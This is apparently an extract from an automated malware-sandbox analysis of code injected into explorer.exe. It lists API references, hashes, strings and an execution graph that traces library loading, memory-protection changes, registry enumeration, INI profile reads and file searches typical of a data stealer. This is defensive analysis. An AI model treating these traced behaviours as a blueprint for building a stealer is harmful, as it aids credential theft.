                                                                                                                              • Opcode Fuzzy Hash: 02e4140addec74b8a3b095d1c51008528f38611a5c1305f321259de480d4cbc4
                                                                                                                              • Instruction Fuzzy Hash: 2CE1F430E0C3928BE7A58A288C5032BBBE1FF95308F28495DF9C2D73D1D664E955D792
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_801000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: -x0$NaN
                                                                                                                              • API String ID: 0-3447725786
                                                                                                                              • Opcode ID: 6ec534b1d8dd8ae8347ea10d59aae216a597f2121d16daca641fc9ce2739ad18
                                                                                                                              • Instruction ID: c3a73e0291d8ad069382fc5ccaef544debd85c22b54ef5ccc5c22dd6d80090ea
                                                                                                                              • Opcode Fuzzy Hash: 6ec534b1d8dd8ae8347ea10d59aae216a597f2121d16daca641fc9ce2739ad18
                                                                                                                              • Instruction Fuzzy Hash: 29E1E230E0C3828BE7A58A28CC9172ABBE1FF95304F28495DF8C1D73D1D664E955D792
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_801000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: -x0$NaN
                                                                                                                              • API String ID: 0-3447725786
                                                                                                                              • Opcode ID: e21c275a60b857c50945a54537f5a7dfe1a42e5497f1fa4f1300408e4270d753
                                                                                                                              • Instruction ID: d76ed364d4a3492736babce2fbb80ebe951f1eef0f96e0318668a058885363ca
                                                                                                                              • Opcode Fuzzy Hash: e21c275a60b857c50945a54537f5a7dfe1a42e5497f1fa4f1300408e4270d753
                                                                                                                              • Instruction Fuzzy Hash: 31E1E170E0C3928BE7A58A28CC9072ABBE1FF95304F28495DF8C1C73D2D664E955D792
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_801000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: -x0$NaN
                                                                                                                              • API String ID: 0-3447725786
                                                                                                                              • Opcode ID: a37bbf889588b17ec5ad886a50ea9f372ad9f668e62b686ea07cde4b7158de75
                                                                                                                              • Instruction ID: 81d3cbb21a5e2a4f6d1cd6c7054066f095c191ba8631f084deb70397acb0abff
                                                                                                                              • Opcode Fuzzy Hash: a37bbf889588b17ec5ad886a50ea9f372ad9f668e62b686ea07cde4b7158de75
                                                                                                                              • Instruction Fuzzy Hash: EEE1F370A0C3928BE7A58A28CC9072ABBE1FF95304F24495DF8C2C73D1D664E955C742
                                                                                                                              APIs
                                                                                                                              • _aulldvrm.NTDLL(00000000,00000002,0000000A,00000000), ref: 0080720E
                                                                                                                              • _aullrem.NTDLL(00000000,?,0000000A,00000000), ref: 00807226
                                                                                                                              • _aulldvrm.NTDLL(00000000,00000000,?), ref: 0080727B
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_801000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _aulldvrm$_aullrem
                                                                                                                              • String ID: -x0$NaN
                                                                                                                              • API String ID: 105165338-3447725786
                                                                                                                              • Opcode ID: e50555a394849fd32df3a992e3a8610886a5cf1a4f965607629faa0880ebe795
                                                                                                                              • Instruction ID: 245a392ea7f52657e27b456395b3a8bc2eeb1fd4c90d0af760578a8b1067e27f
                                                                                                                              • Opcode Fuzzy Hash: e50555a394849fd32df3a992e3a8610886a5cf1a4f965607629faa0880ebe795
                                                                                                                              • Instruction Fuzzy Hash: 84D1F470E0C7928BE7A58A288C9072BBBE1FF95304F28495DF8C2C73D1D664E955D782
                                                                                                                              APIs
                                                                                                                              • _allmul.NTDLL(00000000,?,0000000A,00000000), ref: 00808AAD
                                                                                                                              • _allmul.NTDLL(?,?,0000000A,00000000), ref: 00808B66
                                                                                                                              • _allmul.NTDLL(?,00000000,0000000A,00000000), ref: 00808C9B
                                                                                                                              • _alldvrm.NTDLL(?,00000000,0000000A,00000000), ref: 00808CAE
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_801000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _allmul$_alldvrm
                                                                                                                              • String ID: .
                                                                                                                              • API String ID: 115548886-248832578
                                                                                                                              • Opcode ID: f137aa3beada4183863d5b70bd7f654bc39852b5464484bb9c970c26b1ed1643
                                                                                                                              • Instruction ID: 2114e57aaaa0fb61c15da48d80817cd200122cc81578a68b81da9241a572cfb5
                                                                                                                              • Opcode Fuzzy Hash: f137aa3beada4183863d5b70bd7f654bc39852b5464484bb9c970c26b1ed1643
                                                                                                                              • Instruction Fuzzy Hash: 8BD1E6B190D799CBD7A49F088C8022ABBF0FB95315F04095EFAC5D72D1DBB189858B86
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_801000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: memset
                                                                                                                              • String ID: ,$7$9
                                                                                                                              • API String ID: 2221118986-1653249994
                                                                                                                              • Opcode ID: b1d51447b54f57044a401778e5baa02a08deb2ee8b9c42d589ff759b1829e7d0
                                                                                                                              • Instruction ID: 5c9f065025922355a841a56f7d699f92c067c80525d6906460a7b692b5f1c639
                                                                                                                              • Opcode Fuzzy Hash: b1d51447b54f57044a401778e5baa02a08deb2ee8b9c42d589ff759b1829e7d0
                                                                                                                              • Instruction Fuzzy Hash: F13156715083949ED320DF64D880B9FBBE8FB85340F00892EB989D6251EB75964CCBA3
                                                                                                                              APIs
                                                                                                                              • lstrlenW.KERNEL32(00000000,00000000,?,00802E75,PathToExe,00000000,00000000), ref: 00801BCC
                                                                                                                              • StrStrIW.SHLWAPI(00000000,.exe,?,00802E75,PathToExe,00000000,00000000), ref: 00801BF0
                                                                                                                              • StrRChrIW.SHLWAPI(00000000,00000000,0000005C,?,00802E75,PathToExe,00000000,00000000), ref: 00801C05
                                                                                                                              • lstrlenW.KERNEL32(00000000,?,00802E75,PathToExe,00000000,00000000), ref: 00801C1C
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_801000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: lstrlen
                                                                                                                              • String ID: .exe
                                                                                                                              • API String ID: 1659193697-4119554291
                                                                                                                              • Opcode ID: 2319891560d6ae8349903bfa8a49dc9ccb1e09d1e8e345e4dcbfa842e554f50e
                                                                                                                              • Instruction ID: 25c30090c256177ee65ce8713c10069ae55a9220703a854a870b82a5f31c9415
                                                                                                                              • Opcode Fuzzy Hash: 2319891560d6ae8349903bfa8a49dc9ccb1e09d1e8e345e4dcbfa842e554f50e
                                                                                                                              • Instruction Fuzzy Hash: 05F0C2303507209AEBA46F349C49ABB72A4FF01362754482AE042C31E1FB64CC51C759
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00801000: GetProcessHeap.KERNEL32(00000008,?,008011C7,?,?,00000001,00000000,?), ref: 00801003
                                                                                                                                • Part of subcall function 00801000: RtlAllocateHeap.NTDLL(00000000), ref: 0080100A
                                                                                                                              • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00802127
                                                                                                                              • _alldiv.NTDLL(?,?,00989680,00000000), ref: 0080213A
                                                                                                                              • wsprintfA.USER32 ref: 0080214F
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_801000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: HeapTime$AllocateFileProcessSystem_alldivwsprintf
                                                                                                                              • String ID: %li
                                                                                                                              • API String ID: 4120667308-1021419598
                                                                                                                              • Opcode ID: af5c25309bab53230be961eb6bfed6b48a726f71e52bd78f0131e2f528d4b825
                                                                                                                              • Instruction ID: 7a59a6dd9ae686ebcc7dca7803e0333baa2af0ba2397b3d1dd407b331a94e677
                                                                                                                              • Opcode Fuzzy Hash: af5c25309bab53230be961eb6bfed6b48a726f71e52bd78f0131e2f528d4b825
                                                                                                                              • Instruction Fuzzy Hash: 7AE0923268020877D7213BB89C0AEAE7B6CEB40B17F404291F900E2182E5664A6483D6
                                                                                                                              APIs
                                                                                                                              • _allmul.NTDLL(?,00000000,00000018), ref: 0081316F
                                                                                                                              • _allmul.NTDLL(-00000001,00000000,?,?), ref: 008131D2
                                                                                                                              • _alldiv.NTDLL(?,?,00000000), ref: 008132DE
                                                                                                                              • _allmul.NTDLL(00000000,?,00000000), ref: 008132E7
                                                                                                                              • _allmul.NTDLL(?,00000000,?,?), ref: 00813392
                                                                                                                                • Part of subcall function 008116CD: memset.NTDLL ref: 0081172B
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_801000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _allmul$_alldivmemset
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3880648599-0
                                                                                                                              • Opcode ID: 046d8b7b3e0929ff4979f6fcf46b9aaa87e7dca74d29b1c13d3f69a449f56726
                                                                                                                              • Instruction ID: a1b736f6a898ee662a756ca86d49af69c2a60abc095481ab3ecc996ea048d4c7
                                                                                                                              • Opcode Fuzzy Hash: 046d8b7b3e0929ff4979f6fcf46b9aaa87e7dca74d29b1c13d3f69a449f56726
                                                                                                                              • Instruction Fuzzy Hash: 11D185706083459BDB24DF69C880BAABBE9FF88704F14482DF995C3251DB70DE85CB96
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_801000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: FOREIGN KEY constraint failed$new$old
                                                                                                                              • API String ID: 0-384346570
                                                                                                                              • Opcode ID: 62d909c51362ee42d50e22314f6885cb04adda19405aa5e607a358688fccb6a1
                                                                                                                              • Instruction ID: 59ded2e66b21c8d2574fc80a2d8023c216a8f4c25f0ef40f4d617cf82bd42e86
                                                                                                                              • Opcode Fuzzy Hash: 62d909c51362ee42d50e22314f6885cb04adda19405aa5e607a358688fccb6a1
                                                                                                                              • Instruction Fuzzy Hash: 40D118B06083109FD718DB289881A2EBBE9FFC8754F10492EF945CB291DB74D985CB93
                                                                                                                              APIs
                                                                                                                              • _alldiv.NTDLL(000000FF,7FFFFFFF,?,?), ref: 008096E7
                                                                                                                              • _alldiv.NTDLL(00000000,80000000,?,?), ref: 00809707
                                                                                                                              • _alldiv.NTDLL(00000000,80000000,?,?), ref: 00809739
                                                                                                                              • _alldiv.NTDLL(00000001,80000000,?,?), ref: 0080976C
                                                                                                                              • _allmul.NTDLL(?,?,?,?), ref: 00809798
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_801000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _alldiv$_allmul
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4215241517-0
                                                                                                                              • Opcode ID: aea503a78b0f5229cb44f0642643f5c49b5350688a0b94e79065ce13f3554f20
                                                                                                                              • Instruction ID: de40854899cd3d37dc2c7ddbc8f61d881b39d64d86c41a8e44dc7eb73cd86dcc
                                                                                                                              • Opcode Fuzzy Hash: aea503a78b0f5229cb44f0642643f5c49b5350688a0b94e79065ce13f3554f20
                                                                                                                              • Instruction Fuzzy Hash: 6421F6331197595AD7F45D1D8CD0B2B7588FBA1791F24412DFDE1C22E3E9538C4180A3
                                                                                                                              APIs
                                                                                                                              • _allmul.NTDLL(?,00000000,00000000), ref: 0081B1B3
                                                                                                                              • _alldvrm.NTDLL(?,?,00000000), ref: 0081B20F
                                                                                                                              • _allrem.NTDLL(?,00000000,?,?), ref: 0081B28A
                                                                                                                              • memcpy.NTDLL(?,?,00000000,?,00000000,?,?,?,00000000,?,?,00000000,00000000), ref: 0081B298
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_801000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _alldvrm_allmul_allremmemcpy
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1484705121-0
                                                                                                                              • Opcode ID: c4620565b238e791998deca626faa87058b35ed992642f4a5543c7c8c5223a07
                                                                                                                              • Instruction ID: 5e6abe4f50808426877635e2517c678d305630f6ecd5c8390d3a1a1a49bfeed5
                                                                                                                              • Opcode Fuzzy Hash: c4620565b238e791998deca626faa87058b35ed992642f4a5543c7c8c5223a07
                                                                                                                              • Instruction Fuzzy Hash: E04117756083419BC714EF29C89196AB7E9FFC8300F05492DF995C7262DB71EC89CB52
                                                                                                                              APIs
                                                                                                                              • GetHGlobalFromStream.COMBASE(?,?), ref: 008018A7
                                                                                                                              • GlobalLock.KERNEL32(00804B57), ref: 008018B6
                                                                                                                              • GlobalUnlock.KERNEL32(?), ref: 008018F4
                                                                                                                                • Part of subcall function 00801000: GetProcessHeap.KERNEL32(00000008,?,008011C7,?,?,00000001,00000000,?), ref: 00801003
                                                                                                                                • Part of subcall function 00801000: RtlAllocateHeap.NTDLL(00000000), ref: 0080100A
                                                                                                                              • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 008018E8
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_801000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Global$Heap$AllocateFromLockMemoryMoveProcessStreamUnlock
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1688112647-0
                                                                                                                              • Opcode ID: 30157b0702a9d86656cbeb8881ca883d6023877af37d8b7c2342b84ffb4c0806
                                                                                                                              • Instruction ID: d63013e14191d3c99785bf8e5e9cf03e141463606cedaeab7ee09fce76eb1472
                                                                                                                              • Opcode Fuzzy Hash: 30157b0702a9d86656cbeb8881ca883d6023877af37d8b7c2342b84ffb4c0806
                                                                                                                              • Instruction Fuzzy Hash: 41014F75200706AFCF515F29DC1885B7BA9FF94762B40853EF455C3291EF35C9149A21
                                                                                                                              APIs
                                                                                                                              • lstrlenW.KERNEL32(?,00000000,00000000,?,?,00802F0C), ref: 00801973
                                                                                                                              • lstrlenW.KERNEL32(00856564,?,?,00802F0C), ref: 00801978
                                                                                                                              • lstrcatW.KERNEL32(00000000,?,?,?,00802F0C), ref: 00801990
                                                                                                                              • lstrcatW.KERNEL32(00000000,00856564,?,?,00802F0C), ref: 00801994
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_801000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: lstrcatlstrlen
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1475610065-0
                                                                                                                              • Opcode ID: 4f0198826b9a6e5873553d7870f89c250e563e814cdd64c38788e050945f7662
                                                                                                                              • Instruction ID: 9f30bd0d24809c788b1713e6f0d32558c1753866ba79e6b5c276e1497be861ab
                                                                                                                              • Opcode Fuzzy Hash: 4f0198826b9a6e5873553d7870f89c250e563e814cdd64c38788e050945f7662
                                                                                                                              • Instruction Fuzzy Hash: C8E0656230021C1B8B5477AE5C94D7B7B9CEAD96B67450039FA04D3352F9569C0946B0
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00806A81: memset.NTDLL ref: 00806A9C
                                                                                                                              • _aulldiv.NTDLL(?,00000000,?,00000000), ref: 0082F2A1
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_801000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _aulldivmemset
                                                                                                                              • String ID: %llu$%llu
                                                                                                                              • API String ID: 714058258-4283164361
                                                                                                                              • Opcode ID: f3e6cf8cf4a44043417112f12cce710aa4f3914f0da74d43ba0499e00d845502
                                                                                                                              • Instruction ID: 4425d9313b8e7acb329932681837d566ba10723a21ad3426923128a736024bdd
                                                                                                                              • Opcode Fuzzy Hash: f3e6cf8cf4a44043417112f12cce710aa4f3914f0da74d43ba0499e00d845502
                                                                                                                              • Instruction Fuzzy Hash: 0721F971A44615ABC710AA28DC42F6B7768FF81730F054238F961D76C2EB25EC65C7E2
                                                                                                                              APIs
                                                                                                                              • _allmul.NTDLL(?,00000000,?), ref: 00812174
                                                                                                                              • _allmul.NTDLL(?,?,?,00000000), ref: 0081220E
                                                                                                                              • _allmul.NTDLL(?,00000000,00000000,?), ref: 00812241
                                                                                                                              • _allmul.NTDLL(00802E26,00000000,?,?), ref: 00812295
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_801000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _allmul
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4029198491-0
                                                                                                                              • Opcode ID: 3085842643abf35a20991388616d187f76d7e9293e8280a6adbe6ee58f7c727c
                                                                                                                              • Instruction ID: 810a19088e8b612db92e16117107c33d8c2b777d8e2865f8e77ccb7b77328410
                                                                                                                              • Opcode Fuzzy Hash: 3085842643abf35a20991388616d187f76d7e9293e8280a6adbe6ee58f7c727c
                                                                                                                              • Instruction Fuzzy Hash: B1A149706087059BDB14EE68C891AAEB7EAFFD8704F00492DF655C7361EB70EC958B42
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_801000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: memcpymemset
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1297977491-0
                                                                                                                              • Opcode ID: 2eef65d14c9d0fd15180a28409a4d0039cf55ea0b4bc81846a5499eb8e68c88a
                                                                                                                              • Instruction ID: 84630c16cdf71e0985daefe9d550ae7af7bfdfdc40e02253bc5159ffd311c8fc
                                                                                                                              • Opcode Fuzzy Hash: 2eef65d14c9d0fd15180a28409a4d0039cf55ea0b4bc81846a5499eb8e68c88a
                                                                                                                              • Instruction Fuzzy Hash: 8881707160C3149FC350DF28C880A6BBBE9FF88714F14496DF886D7252E674E989CB92
                                                                                                                              APIs
                                                                                                                              • lstrlen.KERNEL32(?,?,?,?,00000000,00802783), ref: 0080192B
                                                                                                                              • lstrlen.KERNEL32(00000000,?,?,?,00000000,00802783), ref: 00801930
                                                                                                                              • lstrcat.KERNEL32(00000000,?), ref: 00801946
                                                                                                                              • lstrcat.KERNEL32(00000000,00000000), ref: 0080194A
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_801000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: lstrcatlstrlen
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1475610065-0
                                                                                                                              • Opcode ID: 399bb3d0a45afa028bc983ac2631141ca291c4dfb8a24463543a13690187a454
                                                                                                                              • Instruction ID: 8e2d49e670b9c7a5e8717a9d51e1767434e012141638409b9e12fea4ac2a38e1
                                                                                                                              • Opcode Fuzzy Hash: 399bb3d0a45afa028bc983ac2631141ca291c4dfb8a24463543a13690187a454
                                                                                                                              • Instruction Fuzzy Hash: D2E09B5630071C1B4B6177AE5C98D7B7ADCEAD56B63450135FE04D3302FD559C0546B0

                                                                                                                              Execution Graph

                                                                                                                              Execution Coverage:21.6%
                                                                                                                              Dynamic/Decrypted Code Coverage:87.3%
                                                                                                                              Signature Coverage:0%
                                                                                                                              Total number of Nodes:181
                                                                                                                              Total number of Limit Nodes:17
                                                                                                                              execution_graph 941 c8a298 946 c8a29d 941->946 942 c8a385 LoadLibraryA 942->946 944 c8a3e0 VirtualProtect VirtualProtect 945 c8a46e 944->945 945->945 946->942 946->944 947 c8a3d5 946->947 996 c83608 1001 c83458 StrStrIW 996->1001 999 c83458 17 API calls 1000 c8365d 999->1000 1002 c8348f 1001->1002 1014 c8350f 1001->1014 1026 c82774 1002->1026 1004 c83523 RegOpenKeyExW 1005 c835e4 1004->1005 1016 c8354d 1004->1016 1006 c81860 RtlFreeHeap 1005->1006 1008 c835f7 1006->1008 1007 c835b5 RegEnumKeyExW 1007->1005 1007->1016 1008->999 1009 c834a8 1010 c83507 1009->1010 1009->1014 1039 c828a0 1009->1039 1011 c81860 RtlFreeHeap 1010->1011 1011->1014 1013 c82700 RtlFreeHeap 1013->1016 1014->1004 1016->1007 1016->1013 1018 c83458 14 API calls 1016->1018 1022 c81860 RtlFreeHeap 1016->1022 1017 c834fa 1019 c81860 RtlFreeHeap 1017->1019 1018->1016 1019->1010 1022->1016 1025 c81860 RtlFreeHeap 1025->1017 1027 c82793 1026->1027 1028 c82797 RegOpenKeyExW 1026->1028 1027->1028 1029 c8286b 1028->1029 1030 c827d5 RegQueryValueExW 1028->1030 1032 c82774 RtlFreeHeap 1029->1032 1033 c8288d 1029->1033 1031 c8285b RegCloseKey 1030->1031 1034 c827fe 1030->1034 1031->1029 1031->1033 1032->1033 1033->1009 1034->1031 1035 c8281a RegQueryValueExW 1034->1035 1036 c82851 1035->1036 1037 c82844 1035->1037 1038 c81860 RtlFreeHeap 1036->1038 1037->1031 1038->1037 1041 c828b9 1039->1041 1040 c82922 1040->1017 1045 c82700 1040->1045 1041->1040 1042 c81860 RtlFreeHeap 1041->1042 1043 c828df 1042->1043 1043->1040 1044 c82774 5 API calls 1043->1044 1044->1043 1046 c82712 1045->1046 1047 c81860 RtlFreeHeap 1046->1047 1048 c8271d 1047->1048 1048->1017 1049 c83254 1048->1049 1073 c8298c 1049->1073 1052 c8343a 1052->1025 1053 c8298c GetFileAttributesW 1055 c83295 1053->1055 1054 c8342c 1082 c830a8 1054->1082 1055->1052 1055->1054 1077 c82938 1055->1077 1059 c8340c 1061 c81860 RtlFreeHeap 1059->1061 1060 c83304 GetPrivateProfileSectionNamesW 1060->1059 1071 c8331e 1060->1071 1062 c83414 1061->1062 1063 c81860 RtlFreeHeap 1062->1063 1064 c8341c 1063->1064 1065 c81860 RtlFreeHeap 1064->1065 1067 c83424 1065->1067 1066 c8334e GetPrivateProfileStringW 1068 c83379 GetPrivateProfileIntW 1066->1068 1066->1071 1069 c81860 RtlFreeHeap 1067->1069 1068->1071 1069->1054 1070 c830a8 RtlFreeHeap FindFirstFileW FindNextFileW FindClose 1070->1071 1071->1059 1071->1066 1071->1070 1072 c81860 RtlFreeHeap 1071->1072 1072->1071 1074 c82999 1073->1074 1075 c829a9 1073->1075 1074->1075 1076 c8299e GetFileAttributesW 1074->1076 1075->1052 1075->1053 1076->1075 1078 c82945 1077->1078 1080 c82980 1077->1080 1079 c8294a CreateFileW 1078->1079 1078->1080 1079->1080 1081 c82972 CloseHandle 1079->1081 1080->1059 1080->1060 1081->1080 1083 c830cc 1082->1083 1084 c830f1 FindFirstFileW 1083->1084 1085 c83237 1084->1085 1095 c83117 1084->1095 1086 c81860 RtlFreeHeap 1085->1086 1087 c8323f 1086->1087 1088 c81860 RtlFreeHeap 1087->1088 1089 c83247 1088->1089 1089->1052 1090 c83210 FindNextFileW 1092 c83226 FindClose 1090->1092 1090->1095 1091 c82700 RtlFreeHeap 1091->1095 1092->1085 1093 c81860 RtlFreeHeap 1093->1090 1095->1090 1095->1091 1095->1093 1096 c830a8 RtlFreeHeap 1095->1096 1097 c81860 RtlFreeHeap 1095->1097 1098 c82f7c 1095->1098 1096->1095 1097->1095 1108 c82bc0 1098->1108 1101 c83086 1101->1095 1103 c8307e 1104 c81860 RtlFreeHeap 1103->1104 1104->1101 1105 c82e04 RtlFreeHeap 1106 c82fb6 1105->1106 1106->1101 1106->1103 1106->1105 1107 c81860 RtlFreeHeap 1106->1107 1107->1106 1109 c82bf3 1108->1109 1110 c82700 RtlFreeHeap 1109->1110 1111 c82c54 1110->1111 1112 c82a54 RtlFreeHeap 1111->1112 1113 c82c68 1112->1113 1114 c82c7e 1113->1114 1115 c81860 RtlFreeHeap 1113->1115 1116 c81860 RtlFreeHeap 1114->1116 1115->1114 1122 c82cb2 1116->1122 1117 c82da3 1118 c81860 RtlFreeHeap 1117->1118 1119 c82dd9 1118->1119 1120 c81860 RtlFreeHeap 1119->1120 1121 c82de1 1120->1121 1121->1101 1124 c82a54 1121->1124 1122->1117 1123 c81860 RtlFreeHeap 1122->1123 1123->1117 1126 c82a86 1124->1126 1125 c82ad9 1125->1106 1126->1125 1127 c81860 RtlFreeHeap 1126->1127 1127->1125 1128 c83668 1129 c83458 17 API calls 1128->1129 1130 c8369b 1129->1130 1131 c83458 17 API calls 1130->1131 1132 c836bd 1131->1132 1148 c8a1f9 1149 c8a228 1148->1149 1151 c8a248 1148->1151 1150 c8a298 3 API calls 1149->1150 1150->1151 1133 c8a1af 1134 c8a1bd 1133->1134 1135 c8a1cf 1134->1135 1137 c8a298 1134->1137 1142 c8a29d 1137->1142 1138 c8a385 LoadLibraryA 1138->1142 1140 c8a3e0 VirtualProtect VirtualProtect 1141 c8a46e 1140->1141 1141->1141 1142->1138 1142->1140 1143 c8a3d5 1142->1143 1143->1135 1144 c8a1e0 1145 c8a1e6 1144->1145 1146 c8a298 3 API calls 1145->1146 1147 c8a248 1146->1147 948 c837f4 949 c83804 948->949 956 c8372c 949->956 953 c83817 954 c8387c 953->954 966 c836c8 953->966 957 c8375a 956->957 958 c83777 RegCreateKeyExW 957->958 959 c837bc RegCloseKey 958->959 960 c837cd 958->960 959->960 974 c81860 960->974 963 c822b4 964 c822c8 CreateStreamOnHGlobal 963->964 965 c822d6 963->965 964->965 965->953 967 c8371e 966->967 969 c836cd 966->969 967->954 968 c83716 971 c81860 RtlFreeHeap 968->971 969->968 978 c821e4 969->978 971->967 972 c83706 973 c81860 RtlFreeHeap 972->973 973->968 975 c8186e 974->975 976 c81886 975->976 977 c81878 RtlFreeHeap 975->977 976->954 976->963 977->976 979 c8220b 978->979 984 c81e20 979->984 982 c81860 RtlFreeHeap 983 c82297 982->983 983->972 993 c81e6d 984->993 985 c821b5 986 c81860 RtlFreeHeap 985->986 987 c821cb 986->987 987->982 988 c8219b 988->985 989 c81860 RtlFreeHeap 988->989 989->985 990 c81860 RtlFreeHeap 991 c8218e 990->991 991->988 992 c81860 RtlFreeHeap 991->992 992->988 993->985 993->988 994 c81860 RtlFreeHeap 993->994 995 c82177 993->995 994->995 995->990

                                                                                                                              Callgraph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              • Opacity -> Relevance
                                                                                                                              • Disassembly available
